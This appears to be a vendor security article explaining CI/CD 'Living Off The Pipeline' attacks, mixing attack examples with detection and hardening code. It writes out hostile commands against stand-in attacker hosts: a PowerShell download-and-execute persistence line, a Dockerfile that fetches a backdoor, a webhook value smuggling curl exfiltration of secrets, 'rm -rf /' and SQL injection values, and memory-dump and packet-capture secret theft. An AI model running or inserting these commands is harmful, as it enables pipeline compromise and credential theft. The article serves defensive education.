Living Off The Pipeline: CI/CD Supply Chain Attacks Explained





In early 2026, the cybersecurity landscape witnessed a dramatic shift as adversaries began targeting Continuous Integration/Continuous Deployment (CI/CD) pipelines as trusted execution environments. This evolution represents a sophisticated progression from traditional software supply chain attacks to infrastructure-level compromise, where attackers leverage legitimate pipeline components for malicious purposes. These "Living Off The Pipeline" (LOTP) techniques exploit the inherent trust placed in automated build and deployment processes, making detection significantly more challenging.

Unlike conventional supply chain attacks that focus on compromising source code repositories or third-party dependencies, LOTP attacks manipulate the very infrastructure responsible for building, testing, and deploying applications. By hijacking pipeline runners, poisoning artifacts, manipulating environment variables, and extracting sensitive secrets, attackers gain unprecedented access to production environments while maintaining the appearance of legitimate operations. This approach has been demonstrated in several high-profile incidents throughout 2025 and early 2026, affecting organizations across various sectors.

The implications of these attacks extend far beyond typical data breaches. When adversaries control the pipeline, they can inject malicious code into every application built through that infrastructure, potentially affecting thousands of downstream consumers. The trust relationship between development teams and their CI/CD systems becomes weaponized against them. As organizations continue to accelerate their digital transformation efforts and increase reliance on automated deployment processes, understanding and defending against these sophisticated attack vectors becomes critical for maintaining software integrity and organizational security.

This comprehensive analysis explores the emerging threat landscape of CI/CD supply chain attacks, providing detailed insights into specific techniques, real-world examples, and robust defensive strategies. We'll examine how modern AI-powered security tools like those available through mr7.ai can enhance detection capabilities and streamline incident response efforts.

What Are CI/CD Supply Chain Attacks and Why Are They Dangerous?

CI/CD supply chain attacks represent a sophisticated category of cyber threats that target the automated software development lifecycle. These attacks specifically focus on compromising the continuous integration and continuous deployment pipelines that organizations rely on for rapid, secure software delivery. Unlike traditional supply chain attacks that might target third-party libraries or open-source dependencies, CI/CD attacks target the underlying infrastructure and processes that govern how software is built, tested, and deployed.

The fundamental danger lies in the inherent trust relationships within CI/CD systems. Development teams place enormous confidence in their automated pipelines, assuming that code passing through these systems has undergone proper validation and security checks. Attackers exploit this trust by inserting malicious activities into legitimate pipeline executions, making their actions appear as normal operational procedures.

One of the most concerning aspects of CI/CD supply chain attacks is their potential for impact amplification. A single compromised pipeline can affect every application built through that infrastructure, potentially reaching millions of end users. The SolarWinds compromise, in which attackers tampered with the vendor's build process so that signed updates shipped with a backdoor, set the precedent; LOTP techniques generalize it by abusing the pipeline's own runners, configuration, and secrets rather than a single product's build.

From a technical perspective, CI/CD pipelines present numerous attack surfaces:

- Pipeline Configuration Files: YAML files defining workflows often contain sensitive information and logic that can be manipulated

- Runner Environments: The compute resources executing pipeline jobs can be hijacked for persistent access

- Artifact Repositories: Built packages and containers can be poisoned with malicious code

- Secret Management Systems: Credentials stored for automated deployments become prime targets

- Environment Variables: Runtime configuration can be manipulated to alter execution behavior

Consider a typical GitHub Actions workflow:

```yaml
name: Build and Deploy
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - name: Install dependencies
        run: npm ci
      - name: Run tests
        run: npm test
      - name: Build application
        run: npm run build
      - name: Deploy to production
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
        run: |
          curl -X POST https://api.deployment-service.com/deploy \
            -H "Authorization: Bearer $DEPLOY_TOKEN" \
            -d @build/artifacts.zip
```

In this example, an attacker could potentially manipulate any step, inject malicious code during the build process, or exfiltrate the DEPLOY_TOKEN for unauthorized access to production systems.
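One concrete way a step can be manipulated is through a mutable reference such as `@v3`: a Git tag can be moved to a different commit, so the code behind the step can change without the workflow file changing. The following is a minimal sketch of an audit that flags such references, assuming the workflow is available as plain text. The function name `find_unpinned_actions` and the sample action `example-org/example-action` are hypothetical, and the check simply treats a full 40-character commit SHA as pinned.

```python
import re

# Matches "uses: owner/repo@ref" lines, with or without a leading "- ".
USES_PATTERN = re.compile(r"^\s*(?:-\s*)?uses:\s*([\w./-]+)@(\S+)\s*$", re.MULTILINE)
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def find_unpinned_actions(workflow_text):
    """Return (action, ref) pairs whose ref is not a full 40-character commit SHA."""
    findings = []
    for action, ref in USES_PATTERN.findall(workflow_text):
        if not FULL_SHA.match(ref):
            findings.append((action, ref))
    return findings


# Illustrative input only; the third action name is made up for this sketch.
SAMPLE = """
steps:
  - uses: actions/checkout@v3
  - name: Setup Node.js
    uses: actions/setup-node@v3
  - uses: example-org/example-action@0123456789abcdef0123456789abcdef01234567
"""

for action, ref in find_unpinned_actions(SAMPLE):
    print(f"{action} is referenced by mutable ref '{ref}'")
```

A check like this only narrows one avenue. It says nothing about what the pinned commit actually contains, so it complements review of third-party actions rather than replacing it.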

The stealthy nature of these attacks makes them particularly dangerous. Because malicious activity occurs within legitimate pipeline executions, traditional security monitoring tools often fail to flag it as anomalous. The attack traffic looks like normal build communication, which makes attribution and investigation extremely challenging.

Organizations face additional complications because CI/CD systems typically operate with elevated privileges necessary for deployment operations. Compromised pipelines can potentially access production databases, cloud infrastructure, and other critical systems that would normally be protected by network segmentation and access controls.

Understanding these attack vectors requires recognizing that modern software development practices have created new trust boundaries that attackers actively exploit. The speed and automation benefits of CI/CD pipelines come with inherent security trade-offs that organizations must carefully manage through robust security controls and monitoring capabilities.

Key Insight: CI/CD supply chain attacks exploit the blind trust organizations place in their automated deployment infrastructure, allowing attackers to achieve widespread impact through targeted pipeline compromises.

How Do Attackers Hijack CI/CD Pipeline Runners?

Pipeline runner hijacking represents one of the most insidious techniques in the LOTP arsenal, allowing attackers to establish persistent access within trusted build environments. Runners are the compute resources responsible for executing pipeline jobs, and compromising them provides attackers with a privileged foothold inside an organization's development infrastructure.

The attack methodology typically begins with identifying vulnerable configurations or exploiting weaknesses in runner provisioning processes. Many organizations use self-hosted runners for performance or compliance reasons, which can introduce additional attack surfaces compared to managed cloud-based alternatives. Self-hosted runners often maintain persistent connections to CI/CD platforms and may retain cached credentials or have broader network access than intended.

One common vector involves exploiting misconfigured Docker containers used as build environments. Consider a scenario where a pipeline job uses a container image with unnecessary privileges:

```dockerfile
# Vulnerable Dockerfile for CI/CD runner
FROM ubuntu:22.04

# Installing build tools with root privileges
RUN apt-get update && apt-get install -y \
    build-essential \
    git \
    curl \
    && rm -rf /var/lib/apt/lists/*

# Running as root (security risk)
USER root
WORKDIR /workspace

# Copying application code
COPY . .

# Building application
RUN make build
```

An attacker could exploit this configuration by injecting malicious code during the build process that persists beyond the job execution. More sophisticated approaches involve creating backdoor mechanisms that activate under specific conditions.

Another prevalent technique involves compromising the runner registration process. Attackers may intercept communication between runners and CI/CD platforms to register their own malicious runners:

```bash
# Example of runner registration interception

# Normal registration process
./config.sh --url https://github.com --token ABC123XYZ

# Malicious registration with compromised token
./config.sh --url https://github.com --token COMPROMISED_TOKEN --name "legitimate-runner"

# Attacker's runner now receives legitimate jobs
```

Once a runner is compromised, attackers can implement various persistence mechanisms. Fileless malware techniques are particularly effective since many security tools don't monitor ephemeral build environments:

```powershell
# PowerShell example of fileless persistence in Windows runners
$maliciousCode = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious-server/payload.ps1")'
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'BuildAgent' -Value $maliciousCode
```

The impact of runner hijacking extends beyond simple code injection. Compromised runners can:

- Exfiltrate secrets and credentials used during pipeline execution

- Modify build artifacts to include backdoors or malicious functionality

- Establish reverse shells for persistent remote access

- Monitor network traffic for sensitive information

- Pivot to other systems within the development infrastructure

Detecting runner compromise presents significant challenges. The ephemeral nature of many build environments means traditional endpoint protection solutions may not have enough time to analyze suspicious activity. Additionally, the volume of legitimate build processes can overwhelm security monitoring systems with false positives.

Organizations can implement several defensive measures:

- Isolated Runner Environments: Ensure runners operate in restricted network segments with minimal access to sensitive systems

- Regular Reimaging: Implement automated processes to regularly rebuild runner images from trusted sources

- Behavioral Monitoring: Deploy specialized monitoring for unusual runner activities such as unexpected network connections or file modifications

- Credential Rotation: Regularly rotate secrets used by runners and implement just-in-time credential provisioning

Advanced detection strategies involve implementing behavioral baselines for normal runner activity and alerting on deviations. Machine learning models can help identify anomalous patterns that might indicate compromise:

```python
# Simplified example of anomaly detection for runner behavior
import numpy as np
from sklearn.ensemble import IsolationForest

def detect_runner_anomalies(metrics_data):
    # metrics_data contains CPU usage, network traffic, file operations, etc.
    model = IsolationForest(contamination=0.1)
    anomalies = model.fit_predict(metrics_data)
    return anomalies == -1  # Return True for anomalous samples
```

Key Insight: Runner hijacking provides attackers with persistent access to trusted build environments, enabling them to manipulate artifacts and exfiltrate sensitive information while remaining undetected.

Hands-on practice: Try these techniques with mr7.ai's 0Day Coder for code analysis, or use mr7 Agent to automate the full workflow.

What Techniques Are Used for Artifact Poisoning in CI/CD Pipelines?

Artifact poisoning represents a sophisticated attack vector within CI/CD supply chain attacks, where adversaries manipulate build outputs to include malicious code or backdoors. This technique leverages the trust relationship between development teams and their automated build processes, allowing attackers to distribute compromised software to unsuspecting users and downstream systems.

The poisoning process typically occurs during the build phase when source code is compiled, packaged, or containerized. Attackers can inject malicious payloads at various stages, from modifying compilation flags to altering packaging scripts. One common approach involves manipulating dependency resolution during the build process:

```bash
# Example of poisoned dependency injection

# Normal package installation
npm install

# Attacker modifies package-lock.json to include malicious package
sed -i 's/"dependencies": {/"dependencies": {"malicious-package": "1.0.0",/' package-lock.json
npm install

# Malicious package executes during build
```
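A tampered lockfile of this kind can sometimes be caught before `npm install` runs. The sketch below assumes a lockfile in the newer format that carries a top-level `packages` map, and flags entries that either resolve to a host outside an allowlist or lack an `integrity` hash. The function name `audit_lockfile`, the allowlist contents, and the sample data (including the placeholder `sha512-EXAMPLE` value) are illustrative assumptions, not part of any npm tooling.

```python
import json
from urllib.parse import urlparse

# Assumption: the public registry is the only trusted source; adjust for a private one.
TRUSTED_HOSTS = {"registry.npmjs.org"}


def audit_lockfile(lock_text, trusted_hosts=TRUSTED_HOSTS):
    """Flag lockfile entries with an untrusted source or no integrity hash."""
    lock = json.loads(lock_text)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":  # the root project entry carries no download metadata
            continue
        host = urlparse(meta.get("resolved", "")).hostname
        if host not in trusted_hosts:
            findings.append((path, "untrusted or missing source"))
        if "integrity" not in meta:
            findings.append((path, "missing integrity hash"))
    return findings


# Illustrative lockfile; package names and URLs are made up for this sketch.
SAMPLE_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/left-pad": {
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-EXAMPLE",
        },
        "node_modules/malicious-package": {
            "resolved": "http://attacker-server/malicious-package-1.0.0.tgz",
        },
    },
})

for path, reason in audit_lockfile(SAMPLE_LOCK):
    print(f"{path}: {reason}")
```

Locally linked or bundled packages may legitimately lack a `resolved` URL, so a real check would likely need exceptions for them.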

Container image poisoning is another prevalent technique, particularly relevant given the widespread adoption of containerization in modern software delivery. Attackers can modify base images or inject malicious layers during the build process:

```dockerfile
# Legitimate Dockerfile
FROM node:18-alpine
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
COPY . .
EXPOSE 3000
CMD ["node", "server.js"]

# Poisoned version with embedded backdoor
FROM node:18-alpine
WORKDIR /app

# Download and execute malicious script during build
RUN wget http://attacker-server/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh &

COPY package*.json ./
RUN npm ci --only=production
COPY . .
EXPOSE 3000

# Backdoor activation in startup script
RUN echo 'curl -s http://attacker-server/beacon &> /dev/null &' >> /usr/local/bin/startup.sh
CMD ["sh", "-c", "/usr/local/bin/startup.sh && node server.js"]
```
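The two warning signs in the poisoned version, a base image referenced by a mutable tag and a `RUN` instruction that pulls remote content, can be surfaced with a simple review aid. The sketch below is a deliberately naive line-based check: it does not follow backslash line continuations or multi-stage aliases, and the name `lint_dockerfile` is hypothetical.

```python
import re

# A RUN line that invokes curl or wget against an http(s) URL.
FETCH = re.compile(r"\b(curl|wget)\b.*https?://", re.IGNORECASE)


def lint_dockerfile(text):
    """Return (line_number, message) pairs for two simple warning signs."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        upper = stripped.upper()
        if upper.startswith("FROM ") and "@sha256:" not in stripped:
            findings.append((number, "base image not pinned by digest"))
        if upper.startswith("RUN ") and FETCH.search(stripped):
            findings.append((number, "RUN fetches remote content"))
    return findings


# Shortened copy of the poisoned Dockerfile, used only as sample input.
SAMPLE_DOCKERFILE = "\n".join([
    "FROM node:18-alpine",
    "WORKDIR /app",
    "RUN wget http://attacker-server/backdoor.sh -O /tmp/bd.sh",
    "COPY . .",
])

for number, message in lint_dockerfile(SAMPLE_DOCKERFILE):
    print(f"line {number}: {message}")
```

Legitimate Dockerfiles also download files during the build, so findings from a check like this are prompts for human review rather than verdicts.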

Binary manipulation techniques allow attackers to modify compiled executables without altering source code. This approach is particularly effective because it bypasses source code review processes:

```bash
# Example of binary poisoning using objcopy

# Extract original binary sections
objcopy --dump-section .text=original_text.bin legitimate_binary

# Inject malicious code into text section
objcopy --update-section .text=malicious_code.bin --set-section-flags .text=alloc,load,code legitimate_binary poisoned_binary

# Verify modification
readelf -a poisoned_binary | grep -A5 -B5 "malicious_function"
```

Configuration file poisoning represents another subtle attack vector. Attackers can modify application configuration files during the build process to enable backdoor functionality or weaken security controls:

```yaml
# Legitimate application configuration
server:
  port: 3000
  ssl: true
logging:
  level: INFO
---
# Poisoned configuration with backdoor settings
server:
  port: 3000
  ssl: true
  # Hidden backdoor port
  backdoor_port: 1337
logging:
  level: INFO
  # Disable logging for backdoor activities
  backdoor_logging: false
```

The sophistication of artifact poisoning attacks has increased dramatically, with some campaigns employing polymorphic malware that changes its signature with each build to evade detection. The table below compares common poisoning techniques:

| Poisoning Technique | Detection Difficulty | Impact Severity | Common Targets |
|---|---|---|---|
| Dependency Injection | Medium | High | Package managers, build tools |
| Binary Modification | High | Critical | Compiled executables, libraries |
| Container Layer Injection | High | Critical | Docker images, Kubernetes deployments |
| Configuration Manipulation | Low-Medium | Medium | Application configs, environment files |
| Script Hook Injection | Medium | High | Build scripts, deployment hooks |

Detection of poisoned artifacts requires multi-layered approaches combining static analysis, behavioral testing, and integrity verification. Organizations should implement:

- Reproducible Builds: Ensure identical source code produces bit-for-bit identical artifacts

- Artifact Signing: Cryptographically sign all build outputs with verified certificates

- Binary Analysis: Scan binaries for known malicious patterns and unexpected modifications

- Runtime Verification: Monitor application behavior to detect backdoor activation
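The first two items in the list above both reduce to comparing cryptographic digests. As a minimal sketch, assuming artifacts are available as bytes and that a trusted digest was recorded at build time, the check could look like this. The function names are hypothetical, and a bare digest comparison is weaker than real artifact signing because it depends entirely on where the expected digest is stored.

```python
import hashlib


def sha256_digest(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_artifact(data: bytes, expected_digest: str) -> bool:
    """True when the artifact hashes to the digest recorded at build time."""
    return sha256_digest(data) == expected_digest.strip().lower()


def builds_are_reproducible(build_a: bytes, build_b: bytes) -> bool:
    """True when two independent builds of the same source are bit-for-bit identical."""
    return sha256_digest(build_a) == sha256_digest(build_b)


# Stand-in artifact contents for illustration.
original = b"release-1.0.0"
recorded = sha256_digest(original)

print(verify_artifact(original, recorded))
print(verify_artifact(original + b" tampered", recorded))
```

In practice the two independent builds would come from separate, isolated builders, so that a single compromised runner cannot produce both matching outputs.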

Modern security tools can automate much of this detection process. Static analysis engines can identify suspicious code patterns, while behavioral sandboxes can detect runtime anomalies:

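```python
# Example artifact scanning function
import hashlib
import yara

def scan_artifact(file_path, rules_path):
    # Calculate file hash for reputation checking
    with open(file_path, 'rb') as f:
        file_hash = hashlib.sha256(f.read()).hexdigest()

    # Match the artifact against the compiled YARA rules
    rules = yara.compile(filepath=rules_path)
    matches = rules.match(file_path)
    return {'sha256': file_hash, 'matches': [m.rule for m in matches]}
```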

Key Insight: Artifact poisoning allows attackers to distribute compromised software through trusted build processes, requiring comprehensive integrity verification and multi-layered detection approaches.

How Can Attackers Manipulate Environment Variables for Malicious Purposes?

Environment variable manipulation represents a subtle yet powerful technique in CI/CD supply chain attacks, allowing adversaries to influence pipeline behavior without modifying source code or build configurations directly. This attack vector exploits the dynamic nature of environment variables, which are frequently used to control application behavior, configure services, and manage deployment parameters.

Attackers can manipulate environment variables at multiple points within the CI/CD pipeline:

- Pre-execution: Modifying variables before pipeline jobs start

- Runtime: Changing values during job execution

- Post-execution: Altering variables that affect subsequent pipeline stages

One common approach involves exploiting weak input validation in pipeline triggers. Webhooks and API calls that initiate pipeline runs often accept environment variables as parameters, which can be manipulated by attackers with access to trigger mechanisms:

```yaml
# Vulnerable pipeline configuration
name: Deploy Application
on:
  repository_dispatch:
    types: [deploy-request]
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Configure deployment
        run: |
          # Directly using client-provided environment variables
          echo "Deploying to ${{ github.event.client_payload.environment }}"
          export TARGET_ENV=${{ github.event.client_payload.environment }}
          export API_KEY=${{ github.event.client_payload.api_key }}

          # Vulnerable command execution
          ./deploy.sh --env $TARGET_ENV --key $API_KEY
```

In this example, an attacker could craft a malicious webhook payload that manipulates the API_KEY variable to escalate privileges or redirect deployment traffic:

```json
{
  "event_type": "deploy-request",
  "client_payload": {
    "environment": "production",
    "api_key": "valid_key; curl http://attacker-server/exfiltrate?data=$(cat /etc/secrets/* | base64)"
  }
}
```
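A payload like this is rejected outright if the trigger handler validates each field against a strict allowlist before any value reaches a shell. The sketch below illustrates the idea under stated assumptions: the function name `validate_payload` is hypothetical, and the key format (16 to 64 characters drawn from letters, digits, underscore, and hyphen) is an assumed convention rather than anything a real platform mandates.

```python
import re

ALLOWED_ENVIRONMENTS = {"development", "staging", "production"}
# Assumed key format for this sketch; real keys may follow a different scheme.
API_KEY_PATTERN = re.compile(r"[A-Za-z0-9_-]{16,64}")


def validate_payload(client_payload):
    """Return a list of validation errors; an empty list means the payload is acceptable."""
    errors = []
    environment = client_payload.get("environment")
    if not isinstance(environment, str) or environment not in ALLOWED_ENVIRONMENTS:
        errors.append("environment is not in the allowlist")
    api_key = client_payload.get("api_key", "")
    if not isinstance(api_key, str) or not API_KEY_PATTERN.fullmatch(api_key):
        errors.append("api_key contains unexpected characters or length")
    return errors


malicious = {
    "environment": "production",
    "api_key": "valid_key; curl http://attacker-server/exfiltrate?data=$(cat /etc/secrets/* | base64)",
}
print(validate_payload(malicious))
```

Using `fullmatch` rather than `search` matters here: the whole value must conform, so a valid-looking prefix followed by shell metacharacters is still refused.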

Shell injection through environment variables becomes particularly dangerous when combined with inadequate input sanitization. Consider this vulnerable deployment script:

```bash
#!/bin/bash
# Vulnerable deployment script
ENVIRONMENT=$1
CONFIG_FILE="configs/$ENVIRONMENT.conf"

# Loading configuration without validation
source $CONFIG_FILE

# Using environment variables in commands without sanitization
echo "Deploying to $DEPLOY_TARGET"
ssh $SSH_USER@$DEPLOY_TARGET "cd $APP_PATH && git pull origin $BRANCH"

# Vulnerable database connection string
mysql -h $DB_HOST -u $DB_USER -p$DB_PASS -e "USE $DB_NAME; SELECT * FROM users;"
```

An attacker controlling environment variables could set DB_PASS to include malicious SQL or shell commands:

```bash
# Attacker-controlled environment setup
export DB_PASS="legit_password'; DROP TABLE users; -- "
export APP_PATH="/var/www/html; rm -rf / --no-preserve-root"

# Executing vulnerable script
./deploy.sh production
```
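The injection works because the variable's value is spliced into a command string that a shell then re-parses. One hedged way to blunt this, sketched below, is to quote every externally influenced value with `shlex.quote` and to invoke `ssh` with an argument list rather than a single string. The helper names `build_remote_command` and `build_ssh_argv` are hypothetical, and the sketch only builds the command; it does not run it.

```python
import shlex


def build_remote_command(app_path, branch):
    """Compose the remote shell command with every variable quoted."""
    return "cd {} && git pull origin {}".format(shlex.quote(app_path), shlex.quote(branch))


def build_ssh_argv(user, host, app_path, branch):
    # An argument list (no shell=True) keeps the local shell out of the picture.
    # The remote shell still parses the final string, hence the quoting above.
    return ["ssh", "{}@{}".format(user, host), build_remote_command(app_path, branch)]


# The attacker-controlled value from the example above becomes one inert argument.
print(build_remote_command("/var/www/html; rm -rf / --no-preserve-root", "main"))
```

Quoting is a second line of defense. Validating `APP_PATH` and `BRANCH` against expected values before use remains the stronger control.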

Variable shadowing techniques allow attackers to override expected values with malicious alternatives. This is particularly effective when pipelines inherit environment variables from parent processes or shared contexts:

```python
# Python example of environment variable manipulation
import os
import subprocess

# Normal environment setup
os.environ['DATABASE_URL'] = 'postgresql://user:pass@prod-db:5432/app'

# Attacker injection point
if 'MALICIOUS_DB_OVERRIDE' in os.environ:
    os.environ['DATABASE_URL'] = os.environ['MALICIOUS_DB_OVERRIDE']

# Vulnerable subprocess execution
result = subprocess.run([
    'psql', os.environ['DATABASE_URL'],
    '-c', 'SELECT version();'
], capture_output=True)
```
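Shadowing depends on child processes inheriting whatever the parent environment happens to contain. A minimal countermeasure, sketched here with a hypothetical helper named `build_child_env`, is to construct the child's environment explicitly from an allowlist of variable names instead of passing the inherited environment through.

```python
def build_child_env(parent_env, allowed_names):
    """Copy only explicitly allowed variables into the child's environment."""
    return {name: parent_env[name] for name in allowed_names if name in parent_env}


# Illustrative parent environment containing an unexpected override variable.
parent = {
    "PATH": "/usr/bin:/bin",
    "DATABASE_URL": "postgresql://user:pass@prod-db:5432/app",
    "MALICIOUS_DB_OVERRIDE": "postgresql://attacker:pass@evil-server:5432/stolen_data",
}

child_env = build_child_env(parent, ("PATH", "DATABASE_URL"))
print(sorted(child_env))
```

The resulting dictionary can be handed to `subprocess.run(..., env=child_env)`, so the child process never sees variables that were not deliberately passed to it.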

Secrets management vulnerabilities often involve environment variable manipulation. Many pipelines store sensitive credentials in environment variables, which can be accessed by any process running within the same context:

```javascript
// Node.js example showing environment variable exposure
const fs = require('fs');

function deployApplication() {
  // Accessing sensitive environment variables
  const awsAccessKey = process.env.AWS_ACCESS_KEY_ID;
  const awsSecretKey = process.env.AWS_SECRET_ACCESS_KEY;

  // Vulnerable logging that exposes secrets
  console.log(`Deploying with AWS keys: ${awsAccessKey}, ${awsSecretKey}`);

  // Attacker can inject malicious environment variables
  if (process.env.CUSTOM_DEPLOY_SCRIPT) {
    // Dangerous arbitrary code execution
    require('child_process').execSync(process.env.CUSTOM_DEPLOY_SCRIPT);
  }
}
```

Advanced manipulation techniques include timing-based attacks where environment variables change state during execution:

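```bash
# Race condition exploitation
(
  sleep 2
  export DATABASE_URL='postgresql://attacker:pass@evil-server:5432/stolen_data'
) &

# Main deployment process starts immediately
start_deployment_process

# By the time database connection is established,
# environment variable has been modified
#
# Caveat: as written, the export runs in a background subshell and does not
# change the parent shell's environment; a real race needs shared state,
# such as a config file that the deployment re-reads before connecting.
```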

Detection and prevention strategies should include:

- Input Validation: Strictly validate all environment variable inputs against whitelists

- Secure Defaults: Never rely on environment variables for critical security decisions

- Isolation: Run pipeline jobs with minimal environment variable inheritance

- Monitoring: Log and audit all environment variable modifications

- Encryption: Encrypt sensitive values and decrypt only when needed

Organizations can implement protective measures using configuration management tools:

```yaml
# Secure pipeline configuration with variable validation
name: Secure Deploy
on: [push]
jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      # Predefined safe values only
      ALLOWED_ENVIRONMENTS: "development,staging,production"
    steps:
      - name: Validate environment
        run: |
          if [[ ! "$ALLOWED_ENVIRONMENTS" =~ (^|,)$TARGET_ENV(,|$) ]]; then
            echo "Invalid environment: $TARGET_ENV"
            exit 1
          fi
      - name: Sanitize inputs
        run: |
          # Remove special characters that could enable injection
          SANITIZED_KEY=$(echo "$INPUT_API_KEY" | sed 's/[^a-zA-Z0-9_-]//g')
          # A plain export does not survive into later steps; write to GITHUB_ENV instead
          echo "SANITIZED_API_KEY=$SANITIZED_KEY" >> "$GITHUB_ENV"
```

Key Insight: Environment variable manipulation enables attackers to subtly influence pipeline behavior and execute malicious code without direct code modifications, requiring strict input validation and secure configuration practices.

What Methods Exist for Extracting Secrets from CI/CD Pipelines?

Secret extraction from CI/CD pipelines represents one of the most lucrative objectives for adversaries conducting supply chain attacks. These systems often contain highly privileged credentials, encryption keys, and authentication tokens that provide access to critical infrastructure, cloud services, and production environments. The concentrated nature of these secrets makes pipeline compromise extremely valuable for attackers seeking persistent access and lateral movement opportunities.

Common secret storage mechanisms in CI/CD systems include:

- Built-in Secret Stores: Platform-specific encrypted storage (GitHub Secrets, GitLab CI Variables)

- External Secret Managers: HashiCorp Vault, AWS Secrets Manager, Azure Key Vault integrations

- Environment Variables: Runtime variables containing sensitive values

- Configuration Files: Encrypted or plaintext files stored in repositories

- Hardcoded Values: Improperly secured credentials directly in pipeline definitions

Attackers employ various techniques to extract these secrets, ranging from direct theft to sophisticated side-channel attacks. One prevalent method involves exploiting debugging and logging functionalities that inadvertently expose sensitive information:

```yaml
# Vulnerable pipeline with secret exposure
name: Build and Test
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Debug environment
        # DANGEROUS: Exposing all environment variables
        run: printenv | grep -E '(KEY|SECRET|TOKEN|PASSWORD)'

      - name: Configure AWS
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_KEY }}
        run: |
          # Vulnerable command that logs credentials
          aws configure set aws_access_key_id $AWS_ACCESS_KEY_ID
          aws configure set aws_secret_access_key $AWS_SECRET_ACCESS_KEY
          # Debug output that reveals secrets
          echo "Configured AWS with keys ending in: ${AWS_ACCESS_KEY_ID: -4}"
```

Memory dumping techniques allow attackers to extract secrets that remain in process memory after use. Even properly secured secrets can be vulnerable if applications don't clear sensitive data from memory:

```bash
# Memory dumping attack example

# During pipeline execution, dump memory of processes handling secrets
sudo gdb --pid $(pgrep deploy-script) -batch -ex "dump memory /tmp/mem.dmp 0x$(awk '/VmStart/{print $1}' /proc/$(pgrep deploy-script)/maps | head -1) 0x$(awk '/VmEnd/{print $1}' /proc/$(pgrep deploy-script)/maps | tail -1)"

# Search dumped memory for secrets
strings /tmp/mem.dmp | grep -E '(AKIA|AIza|sk-)[A-Za-z0-9]{16,}'
```

Network traffic interception represents another effective extraction method, particularly for secrets transmitted over unencrypted channels or improperly configured secure connections:

```bash
# Network packet capture during pipeline execution

# Start capture before secret usage
tcpdump -i any -w /tmp/pipeline.pcap port 443 or port 80 &
CAPTURE_PID=$!

# Execute pipeline steps that use secrets
./deploy-with-secrets.sh

# Stop capture and analyze
kill $CAPTURE_PID

# Search for potential secret exposure
tshark -r /tmp/pipeline.pcap -Y "http.request.method == POST" -T fields -e http.file_data | strings | grep -E '(secret|key|token)' | head -10
```

Side-channel attacks can extract secrets through timing analysis, power consumption monitoring, or electromagnetic emissions. While more complex, these techniques have proven effective against cryptographic implementations:

```python
# Timing-based side channel attack simulation
import time
import hmac

def vulnerable_compare(secret, guess):
    """Vulnerable string comparison with timing leak"""
    for i in range(len(secret)):
        if i >= len(guess) or secret[i] != guess[i]:
            return False
        # Artificial delay to create timing difference
        time.sleep(0.001)
    return len(secret) == len(guess)

def extract_secret_length():
    """Determine secret length through timing analysis"""
    times = []
    for length in range(1, 50):
        start = time.time()
        vulnerable_compare("SECRET_VALUE", "A" * length)
        end = time.time()
        times.append((length, end - start))

    # Find length with maximum timing difference
    return max(times, key=lambda x: x[1])[0]
```

Repository-based secret extraction exploits improperly secured configuration files or historical commits containing sensitive information:

```bash
# Git history search for exposed secrets
git log -p --all | grep -E '(AKIA|AIza|sk-)[A-Za-z0-9]{16,}|[a-zA-Z0-9+/]{40,}[=]{0,2}' | head -20

# Search for secrets in current repository
grep -r -E '(password|secret|key|token)[[:space:]]*=[[:space:]]*["'"'"'][^"'"'"']{8,}' . --exclude-dir=.git

# Check for base64-encoded secrets
find . -type f -exec grep -l -E '[A-Za-z0-9+/]{20,}[=]{0,2}' {} \; | xargs grep -E '[A-Za-z0-9+/]{20,}[=]{0,2}'
```
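Defenders can run the same kind of pattern search on their own repositories before an attacker does, for instance as a pre-commit check. The sketch below scans text line by line against a small, deliberately incomplete set of patterns. The names `SECRET_PATTERNS` and `scan_text` are hypothetical, and the sample uses the placeholder access key ID that AWS publishes in its documentation.

```python
import re

# A small, non-exhaustive pattern set chosen for illustration.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hardcoded_credential": re.compile(
        r"(?i)\b(?:password|secret|token)\s*=\s*[\"'][^\"']{8,}[\"']"
    ),
}


def scan_text(text):
    """Return (line_number, pattern_label) pairs for lines that look like secrets."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label))
    return findings


SAMPLE_SOURCE = "\n".join([
    'aws_key = "AKIAIOSFODNN7EXAMPLE"',
    'password = "correct-horse-battery"',
    "timeout = 30",
])

for number, label in scan_text(SAMPLE_SOURCE):
    print(f"line {number}: possible {label}")
```

Pattern matching of this kind produces both false positives and misses, which is why it is usually combined with entropy checks and with review of the full commit history rather than only the current tree.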

Comparison of common secret extraction methods:

| Extraction Method | Success Rate | Detection Difficulty | Required Access Level |
|---|---|---|---|
| Environment Dumping | High | Low | Job-level access |
| Memory Analysis | Medium-High | Medium | Process-level access |
| Network Interception | Medium | High | Network-level access |
| Side Channel Attacks | Low-Medium | Very High | Physical/logical proximity |
| Repository Mining | High | Low | Repository access |
| Credential Reuse | High | Low | Knowledge of usage patterns |
